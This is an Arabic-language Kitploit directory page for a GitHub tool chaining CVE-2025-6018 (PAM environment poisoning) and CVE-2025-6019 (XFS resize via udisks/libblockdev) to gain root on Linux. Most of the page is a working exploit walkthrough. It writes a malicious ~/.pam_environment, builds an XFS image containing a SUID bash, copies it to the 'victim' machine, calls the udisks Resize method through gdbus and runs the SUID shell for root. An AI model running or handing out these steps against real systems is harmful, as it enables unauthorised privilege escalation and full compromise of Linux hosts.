Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6018-and-CVE-2025-6019 — سلسلة استغلال لتصعيد الامتيازات عبر تسميم بيئة PAM (CVE-2025-6018) وتغيير حجم نظام ملفات XFS (CVE-2025-6019) للحصول على قشرة جذر على أنظمة لينكس. | Kitploit
أدوات/GitHubGitHub/localh0ste/cve-2025-6018-and-cve-2025-6019
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHublocalh0ste/cve-2025-6018-and-cve-2025-6019

CVE-2025-6018-and-CVE-2025-6019

سلسلة استغلال لتصعيد الامتيازات عبر تسميم بيئة PAM (CVE-2025-6018) وتغيير حجم نظام ملفات XFS (CVE-2025-6019) للحصول على قشرة جذر على أنظمة لينكس.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11منذ 7 أشهرلم تتم المراجعة بعد

تحقق مما إذا كانت ضعيفة أم لا

root@kitploit:~
rpm -q pam || dpkg -l | grep libpam

or

find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null

or
find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null

or

systemctl --version | head -1

إذا كان الإصدار يشمل: (تم اكتشاف إصدار PAM ضعيف) ~المرجع cve_2025_6018

"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"

خطوات الاستغلال

إنشاء ملف بيئة ضار (CVE-2025-6018 تسميم البيئة)

root@kitploit:~
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
XDG_SESSION_TYPE OVERRIDE=x11
XDG_SESSION_CLASS OVERRIDE=user
XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime
SYSTEMD_LOG_LEVEL OVERRIDE=debug'''
EOF

إنشاء صورة XFS (على جهازك الشخصي) وإرسالها إلى الجهاز البعيد

( CVE-2025-6019 -- وصول جذر عبر تغيير حجم XFS في libblockdev)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount

#Create SUID bit as /bash shell

chmod 04555 ./xfs.mount/bash
umount ./xfs.mount
gzip xfs.image
scp ./xfs.image.gz hostname@<ip>:/home/<username>

على الجهاز الضحية

root@kitploit:~
gzip -d xfs.image.gz
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot

أعد الاتصال بالنظام (أعد الاتصال عبر SSH لتفعيل الجلسة النشطة)

root@kitploit:~
udisksctl loop-setup --file ./xfs.image --no-user-interaction
while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
 /tmp/blockdev*/bash -p

احصل على شل الجذر

المرجع: https://www.exploit-db.com/exploits/52386

تنزيل الأداة